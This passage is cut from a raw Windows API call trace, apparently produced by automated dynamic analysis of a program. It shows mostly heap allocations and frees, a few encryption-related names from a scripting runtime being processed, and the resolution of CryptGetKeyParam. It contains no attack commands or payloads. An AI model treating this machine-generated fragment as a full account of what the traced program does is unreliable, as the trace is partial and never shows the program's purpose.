(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0088.538] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0088.538] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0088.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0088.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1880d) returned 0x4516010 [0088.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0088.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0088.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0088.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1880d) returned 0x499a008 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0088.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0088.540] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0088.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0088.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0088.540] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0088.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0088.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0088.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0088.541] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0088.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0088.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0088.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0088.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0088.541] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0088.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0088.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.542] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0088.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.543] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0088.543] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0088.543] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0088.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0088.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0088.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0088.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0088.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0088.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0088.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0088.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0088.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0088.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0088.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0088.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0088.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0088.547] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0088.547] HeapFree (in: 